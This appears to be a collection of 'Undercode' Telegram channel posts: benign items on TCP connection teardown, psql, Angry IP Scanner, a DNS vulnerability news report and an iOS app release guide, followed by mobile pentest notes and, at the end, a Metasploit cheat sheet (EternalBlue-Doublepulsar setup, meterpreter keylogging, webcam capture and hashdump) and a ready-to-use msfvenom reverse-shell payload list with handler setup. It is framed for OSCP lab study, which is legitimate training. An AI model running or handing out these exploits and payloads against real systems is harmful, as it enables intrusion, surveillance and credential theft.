▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Connection termination

1️⃣The connection completion phase uses a four-stage handshake, with each side of the connection terminating independently. When an endpoint wants to stop its half of the connection, it sends a FIN packet, which the other end confirms with an ACK flag packet.

2️⃣Therefore, a typical break requires a pair of FIN and ACK segments from each TCP endpoint. After the party sending the first FIN responded with the last ACK, it waits for a timeout before finally closing the connection, during which the local port is not available for new connections; this prevents confusion due to delayed packets delivered during subsequent connections.

3️⃣The connection may be “half-open”, in which case one side has completed its part and the other has not. The terminating party can no longer send any data to the connection, but the other side can. The final side must continue reading the data until the other side also completes its work.

4️⃣It is also possible to break the connection with a three-step handshake when host A sends FIN, and host B answers FIN & ACK (just combines 2 steps into one) and host A answers ACK.

5️⃣Some operating systems, such as Linux and H-UX, implement a half-duplex closing sequence in the TCP stack. If the host actively closes the connection, but the incoming data remains unread, the host sends an RST signal (loss of all received data) instead of FIN. This guarantees the TCP application that the remote process has read all the transmitted data, waiting for the FIN signal before it actively closes the connection. The remote process cannot distinguish the RST signal to interrupt the connection and data loss. Both cause a remote stack to lose all received data.

6️⃣As you can see in the screenshot, the termination of the TCP connection also occurs as (Linux with the latest kernel):

Client: FIN-ACK

Server: FIN-ACK

Client: ACK

Written by Undercode
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to Display actual PostgreSQL queries
#REQUESTED

1) Display the actual queries generated by \ d and other backslash commands.

2) You can use this to examine PSQL internal operations.
This is equivalent to including the ECHO_HIDDEN variable

> \set ECHO_HIDDEN

🦑Output :

postgres=# \l
* QUERY **
SELECT d.datname as "Name",
pg_catalog.pg_get_userbyid(d.datdba) as "Owner",
pg_catalog.pg_encoding_to_char(d.encoding) as "Encoding",
d.datcollate as "Collate",
d.datctype as "Ctype",
pg_catalog.array_to_string(d.datacl, E'\n') AS "Access privileges"
FROM pg_catalog.pg_database d
ORDER BY 1;
******************

List of databases
Name | Owner | Encoding | Collate | Ctype | Access privileges
-----------+----------+----------+-------------+-------------+-----------------------
postgres | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 |
template0 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | =c/postgres +
| | | | | postgres=CTc/postgres
template1 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | =c/postgres +
| | | | | postgres=CTc/postgres
(3 rows)



▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Support & Share Us ❤️👍🏻

T.me/UndercodeTesting

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Network Terms in Angry IP Scanner
Further tips from the program itself:

general information

Angry IP Scanner tool for scanning IP addresses.

It is used to scan IP addresses in order to find active hosts and collect interesting information about each of them.

You can start by specifying the IP addresses for scanning (local IPs are entered by default) and clicking the "Start" button.

Key terms:

Feeder - Source of IP addresses for scanning. Angry IP Scanner provides various scanning sources: IP Range, IP List File or Random. You can select a source from the drop-down list next to the "Start" button

Data collector - collects specific information about the host, for example, ping time, host name, open ports. Collectors are usually columns as a result of a scan. They can be selected in the menu "Tools-> Data Collectors".

Active host - the host responding to ping. The results sheet is marked in blue.

Inactive host - a host that does not respond to ping (red). However, it may have open ports (if the firewall blocks ping). In order to fully scan such hosts, check the "Scan inactive" checkbox in Tools-> Preferences.

Open port - TCP port that responded to the connection attempt. Greens on the list.

Filtered port - TCP port, does not respond to the fact that it is closed (there is no RST packet). Probably these ports are specifically blocked by firewalls.

Pinging (host check):

Angry IP Scanner can use different ping methods. They can be selected in the "Preferences" window.

ICMP echo is the standard method used by the 'ping' program. On most platforms, requires administrator privileges. Some firewalls prohibit response packets to an ICMP request, making active hosts look inactive.

UDP - sends UDP packets (datagrams) to one of the host ports and monitors the response (whether or not). Not standard, but does not require privileges.

TCP - trying to connect to the 80 (http) port. UDP may work better for some networks, usually not.

Scanning UDP and TCP most often does not detect routers or other network equipment properly.

TTL (time to live) - this collector works only with ICMP ping. The initial value is usually 64 or 128, the difference shows the distance to the host in the number of nodes.

written by undercode
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Osint tool based on namechk.com for checking usernames on more than 100 websites, forums and social networks..->
-termux-linux

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣git clone https://github.com/HA71/Namechk.git

2️⃣cd Namechk

3️⃣Search available username: ./namechk.sh <username> -au

4️⃣Search available username on specifics websites: ./namechk.sh <username> -au -co

5️⃣Search available username list: ./namechk.sh -l -au

6️⃣Search used username: ./namechk.sh <username> -fu

7️⃣Search used username on specifics websites: ./namechk.sh <username> -fu -co

8️⃣Search used username list: ./namechk.sh -l -fu


ENJOY❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Microsoft warns of major vulnerabilities in Windows DNS server
#News

> Microsoft warned that the company listed a key vulnerability in a Windows DNS server 17 years ago as a "worm." Such vulnerabilities may allow attackers to create special malware, execute code remotely on Windows servers, and create malicious DNS queries, which may eventually lead to the intrusion of infrastructure in enterprises and key departments.

> Visit the MSRC report:

https://msrc-blog.microsoft.com/2020/07/14/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/

> "Worm vulnerabilities can spread through vulnerable software through vulnerable software without user interaction," explains Mechele Gruhn, Microsoft's chief security project manager. "Windows DNS server is a core network component. Although it is not known whether this vulnerability is used for active attacks, customers must apply Windows updates as soon as possible to resolve this vulnerability."

> Researchers at Check Point discovered a security vulnerability in Windows DNS and reported it to Microsoft in May. If the patch is not applied, it will make the Windows server vulnerable to attacks, but Microsoft pointed out that there is no evidence of this flaw being used.

> Today, all supported versions of Windows Server provide patches to fix the vulnerability, but system administrators must patch the server as soon as possible before malicious actors create malware based on the vulnerability.

"DNS server vulnerability is a very serious matter," Omri Herscovici, the head of Check Point's vulnerability research team, warned. "Only a few of these types of vulnerabilities have been published. Every organization that uses Microsoft infrastructure, regardless of size, will face significant security risks if they do not apply patches. The worst consequence will be the complete destruction of the entire enterprise network. Microsoft's code has been in existence for more than 17 years; since we can find this vulnerability, it is not impossible for others to have discovered this vulnerability."

> Windows 10 and other client versions of Windows are not affected by this vulnerability, because it only affects Microsoft's Windows DNS Server implementation. Microsoft has also released a registry-based working method to prevent administrators from quickly addressing defects when they cannot quickly patch servers.

> Microsoft gave a maximum risk score of 10 on the Common Vulnerability Scoring System (CVSS), emphasizing the severity of the problem. In contrast, the vulnerability used in the WannaCry attack scored 8.5 on CVSS.

ENJOY❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Computer Data Leakage Prevention System

WHAT IS Computer Data Leakage Prevention System ?

(download address: http://www.grabsun.com/monitorusb.html ) is an enterprise document security management system designed to protect computer files and prevent the disclosure of business secrets. The system can not only completely disable the use of U disks and USB storage devices, but also disable network disks, emails, FTP file uploads, and chat software to send files to disclose company commercial secrets. In addition, the system also integrates a series of computer usage management functions, which can effectively regulate the employee's computer network usage during work hours, which can not only further protect computer file security and network security, but also improve employee work efficiency and achieve network management The real purpose of the.

🦑The specific functions of Dashizhi Enterprise Data Anti-Leakage Software are as follows:

1. You can completely prohibit the use of U disks, mobile hard disks, SD cards, mobile phones to connect to computers, tablet computers and other devices with storage functions.

2. Completely disable the use of optical drives and floppy drives. At the same time, you can only prohibit the burning of optical drives and limit the use of burning optical drives without affecting the playback function of the optical drive.

3. Completely disable the computer COM port, prohibit the use of computer ports, prohibit the use of external devices such as printers.

4. Comprehensively protect the security of the operating system, prohibit the modification of the registry, prohibit the modification of group policies, prohibit the use of msconfig, prohibit entering the computer security mode, disable the use of the task manager, prohibit the use of the device manager, etc.

5. Comprehensively prevent employees from uninstalling, preventing accidental killing or interception by anti-virus software, protecting computer information security to the greatest extent, and protecting enterprise commercial secrets.

6. Allow network administrators to set blacklists that prohibit computers from running programs and whitelists of programs that are only allowed to run, blacklists of URLs that are not allowed to be accessed, and whitelists of URLs that are only allowed to be accessed, thereby enhancing the control of computer usage.

7. The functions of effectively prohibiting network hotspots, prohibiting 360 portable wifi, prohibiting Baidu portable wifi, shielding wifi sharing wizard, and prohibiting wifi master keys, preventing employees from using these portable wifi to provide Internet access for their laptops, mobile phones or tablets .

8. Added banned email sending, banned network disk upload, banned forum attachment upload, banned FTP upload, allowed only specific QQ number login, only allowed specific Aliwangwang account login, banned QQ sending files, banned QQ group shared file upload.

9. Exclusively supports both stand-alone installation and stand-alone management, as well as the management of the server and client based on the C/S architecture, thereby facilitating the user's use.

10. Personalized customization is available for users. All kinds of computer equipment and any configuration of the operating system are forbidden at any time to protect computer security and commercial secrets.


🦑Some guys here hate chineese tools, but anyway we post for learn only !
ENJOY❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ iU𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁


🦑 FREE COURSES iOs by Apple developers :

1️⃣Face ID and your Apps
iOS
One of the most advanced features of iPhone X, Face ID is a secure biometric authentication technology that lets users easily unlock, authenticate, pay, and quickly access your app with just a glance. While it has many similarities to Touch ID, there are a few key differences. Learn more about...

2️⃣Configuring Your Developer Account for Apple Pay
iOS, MacOS
Apple Pay is the easy, secure, and private way to pay for physical goods and services within apps and websites. Find out how you can configure your Apple Developer Account to start using the Apple Pay APIs.

2️⃣Building Sticker Packs
iOS
Turn your artwork into a sticker pack for Messages on iOS 10. Learn how to bundle both images and animations into your sticker pack and test your finished result.

3️⃣Submitting an iMessage App or Sticker Pack - Part 1
iOS
Learn how to distribute your sticker pack on the App Store. Simply add your app to iTunes Connect and enter the required information, including description, keywords, and screenshots.


4️⃣Submitting an iMessage App or Sticker Pack - Part 2
iOS
Find out how to submit your sticker pack to App Review, the last step before your app can be distributed on the App Store.

> WATCH OR DOWNLOAD :
https://developer.apple.com/videos/tutorials

Enjoy❤️👍🏻
▁ ▂ ▄ iU𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ iU𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁


🦑The release of iOS APP is divided into two parts AB, first test the APP, if there is no problem, upload the APP to review!

Part A: The real machine debugging is introduced in 5 steps. If the real machine has been tested well, please directly drop down to see step B.

(Be sure to test the app first before putting it on the shelf, or if there are a bunch of bugs in the app, it will be reviewed but it will waste time)


1. Install Appuploader, an iOS auxiliary software
> http://www.applicationloader.net/appuploader/download.php

2. Log in to Appuploader to apply for iOS development certificate file p12

3. Log in to Appuploader to apply for iOS development certificate description file mobileprovision

4. Use the iOS certificate file to package the Apple APP

5. Install the packaged APP to the Apple mobile phone to test

Part B: App Store review is conducted in 6 steps.

1. Apply for iOS release certificate

2. Apply for iOS release description file

3. Pack ipa

4. iTunes Connect creates APP

5. Upload ipa

6. Set APP information submission for review

@iUndercode
▁ ▂ ▄ iU𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 TOPIC HACKING-PENTESTING
F E A T U R E S :

Multiple Weighted DNSBLs
Multiple Weighted URIBLs
Greylisting
Weighted Regular Expression Filtering
Bayesian
Penalty Box
SenderBase
SSL/TLS
SPF/SRS
Attachment Blocking
ClamAV and FileScan
Blocking Reporting
LDAP support
Backscatter Detection
recipient replacement / GUI user access rights management
MIME charset conversion / DKIM check and signing
multi DB support for all hashes / level based open plugin support
transparent TCP proxy support
Plugins: archive, full attachment check and replacement, OCR
damping (steal spammers time)
AUTH to relay host / POP3 collector
configuration value and file synchronization
Block Reports design could be customized
Razor2 and DCC support using Plugin
SNMP support (monitoring, configuring, controll-API)
user group import (file or LDAP or command based)
automatic crash analyzer Hidden Markov Model
IPv6 socket support
word stemming (several languages) for Bayesian analyzer
Perl module autoupdate via PPM or CPAN
Hidden Markov Model spam detection engine
full unicode support
DMARC support
privat Whitelist (legacy, domain based, user based)
privat IP and Domain lists (legacy, domain based, user based)
CPU affinity settings
web file commander
graphical statistic output (SVG)
native SSL support for target hosts
client SSL-certificate validation
privat SMIME signing
corporate SMIME signing, using a single privat certificate
content based executable attachment blocking
content based compressed attachment blocking
BATV check and signing
Message-ID signing and check FBMTV
remote support
Authenticated Received Chain (ARC) processing and signing
RSS feeds for blocked emails using Plugin
zero day virus detection
VirusTotal API

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

The Anti-Spam SMTP Proxy (ASSP) Server project aims to create an open source platform-independent SMTP Proxy server which implements auto-whitelists, self learning Hidden-Markov-Model and/or Bayesian, Greylisting, DNSBL, DNSWL, URIBL, SPF, SRS, Backscatter, Virus scanning, attachment blocking, Senderbase and multiple other filter methods. Click 'Files' to download the professional version 2.6.3 build 20002.
A linux(ubuntu 18.04 LTS) and a freeBSD 11.2 based ready to run OVA of ASSP V2 are also available for download.

> DOWNLOAD :

> https://sourceforge.net/projects/assp/files/latest/download

enjoy❤️👍🏻
✅Topic 2020 sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Mobile Application Test Notes (Android)

Prepping the application
(After Android Nougat, Apps need to repackaged since they don't trust user certificates by default)
- https://android-developers.googleblog.com/2016/07/changes-to-trusted-certificate.html

+ apktool d <path of the .apk file>
+ Update AndroidManifest.xml
- Add android:networkSecurityConfig="@xml/networksecurityconfig" to application tag in xml
+ Add networksecurityconfig.xml to res/xml folder
- "Trusting user-added CAs for all secure connections" section in
https://android-developers.googleblog.com/2016/07/changes-to-trusted-certificate.html
+ Repackage the application
- apktool b unpackedapkfolder -o <output path to new apk file>
+ Signing the application
- Create a keystore using keytool
- jarsigner -keystore <path to your keystore> -storepass <password> -keypass <password> <path to apk> android

Creating an emulator and installing the application

+ Create a virtual device:
- android avd

+ Start the emulator:
- emulator –avd testavd

+ Install the application:
- adb install <path of the .apk file>

+ Open Burp Suite and navigate to Proxy->Options,
- Edit proxy listeners – enter ‘port’ as 8080, disable ‘loopback only’ and select ‘support invisible’.

+ Start the emulator and proxy:
- emulator –avd testavd –http-proxy http://localhost:8080

+ Download and install burp certificate (.crt) onto the emulator using the push shell command.


Notes:

+ Application file type - x.apk

Install Certs: http://www.realmb.com/droidCert/
SQLite Database Browser: http://sourceforge.net/projects/sqlitebrowser/?source=pdlp

http://www.mcafee.com/uk/resources/white-papers/foundstone/wp-pen-testing-android-apps.pdf


ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Mobile Application Test Notes (iPhone)


Prepping Device and Application:

+ Jailbreak iPhone/iPad - Green Poison / Absinthe 2.04
+ Enable SSH on iPhone/iPad
+ Install iFunbox to install the application (http://www.i-funbox.com)
+ Connect device to lab wireless network
+ Add web proxy settings - IP address of attacking machine port 8080
+ Ensure connection and SSH is working


Prepping Burp Suite:

+ Open Burp Suite and navigate to Proxy->Options,
- Edit proxy listeners – enter ‘port’ as 8080, disable ‘loopback only’ and select ‘support invisible’.

+ Download and install burp certificate (.crt) onto ipad.

Mobile Application Penetration Testing:

+ Browse the following Directory for insecure storage
- /private/var/mobile/applications/


Notes:

+ Application file type - x.ipa

+ Easy way:

- Place attacking machine and apple device on wireless network with app installed.
- Email burps .cer to apple device and install
- Start burp and disable firewall on listening machine.
- Change proxy settings on apple device to point to listening burp machine/port.

ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑METASPLOIT
#FastTips

Search for exploits using Metasploit GitHub framework source code:
*https://github.com/rapid7/metasploit-framework*
Translate them for use on OSCP LAB or EXAM.

Metasploit
MetaSploit requires Postfresql
systemctl start postgresql

To enable Postgresql on startup
systemctl enable postgresql

MSF Syntax
Start metasploit
msfconsole
msfconsole -q


Show help for command
show -h


Show Auxiliary modules
show auxiliary


Use a module
use auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/http/webdav_scanner
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/ftp/ftp_login
use exploit/windows/pop3/seattlelab_pass


Show the basic information for a module
info


Show the configuration parameters for a module
show options


Set options for a module
set RHOSTS 192.168.1.1-254
set THREADS 10


Run the module
run


Execute an Exploit
exploit


Search for a module
search type:auxiliary login


Metasploit Database Access
Show all hosts discovered in the MSF database
hosts


Scan for hosts and store them in the MSF database
db_nmap


Search machines for specific ports in MSF database
services -p 443


Leverage MSF database to scan SMB ports (auto-completed rhosts)
services -p 443 --rhosts


You may find some boxes that are vulnerable to MS17-010 (AKA. EternalBlue). Although, not offically part of the indended course, this exploit can be leveraged to gain SYSTEM level access to a Windows box. I have never had much luck using the built in Metasploit EternalBlue module. I found that the elevenpaths version works much more relabily. Here are the instructions to install it taken from the following YouTube video:
https://www.youtube.com/watch?v=4OHLor9VaRI


1. First step is to configure the Kali to work with wine 32bit

dpkg --add-architecture i386 && apt-get update && apt-get install wine32
rm -r ~/.wine
wine cmd.exe
exit

2. Download the exploit repostory
https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

3. Move the exploit to /usr /share /metasploit-framework /modules /exploits /windows /smb

4. Start metasploit console (spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.)

use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(eternalblue_doublepulsar) > set RHOST 10.10.10.10
RHOST => 10.11.1.73
msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT spoolsv.exe
PROCESSINJECT => spoolsv.exe
msf exploit(eternalblue_doublepulsar) > run



####Experimenting with Meterpreter####

Get system information from Meterpreter Shell
sysinfo

Get user id from Meterpreter Shell
getuid

Search for a file
search -f *pass*.txt

Upload a file
upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec

Download a file
download c:\\Windows\\system32\\calc.exe /tmp/calc.exe

Invoke a command shell from Meterpreter Shell
shell

Exit the meterpreter shell
exit

Metasploit Exploit Multi Handler
multi/handler to accept an incoming reverse_https_meterpreter

payload
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST $ip
set LPORT 443
exploit
[*] Started HTTPS reverse handler on https://$ip:443/


Building Your Own MSF Module
mkdir -p ~/.msf4/modules/exploits/linux/misc
cd ~/.msf4/modules/exploits/linux/misc
cp
/usr/share/metasploitframework/modules/exploits/linux/misc/gld\_postfix.rb
./crossfire.rb
nano crossfire.rb


Post Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities)
- download Download a file or directory
upload Upload a file or directory
portfwd Forward a local port to a remote service
route View and modify the routing table
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
record_mic Record audio from the default microphone for X seconds
webcam_snap Take a snapshot from the specified webcam
getsystem Attempt to elevate your privilege to that of local system.
hashdump Dumps the contents of the SAM database

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑FOR BEGINERS :
+ Creating Metasploit Payloads

List payloads
msfvenom -l

Binaries

Linux
msfvenom -p linux/x86/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Windows
msfvenom -p windows/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Mac
msfvenom -p osx/x86/shellreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho


Web Payloads

PHP
msfvenom -p php/meterpreterreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP
msfvenom -p windows/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP
msfvenom -p java/jspshellreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

WAR
msfvenom -p java/jspshellreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war


Scripting Payloads

Python
msfvenom -p cmd/unix/reversepython LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

Bash
msfvenom -p cmd/unix/reversebash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

Perl
msfvenom -p cmd/unix/reverseperl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl


Shellcode

For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.

Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Windows Based Shellcode
msfvenom -p windows/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Mac Based Shellcode
msfvenom -p osx/x86/shellreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>


Handlers

Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.

use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z

Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘


ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁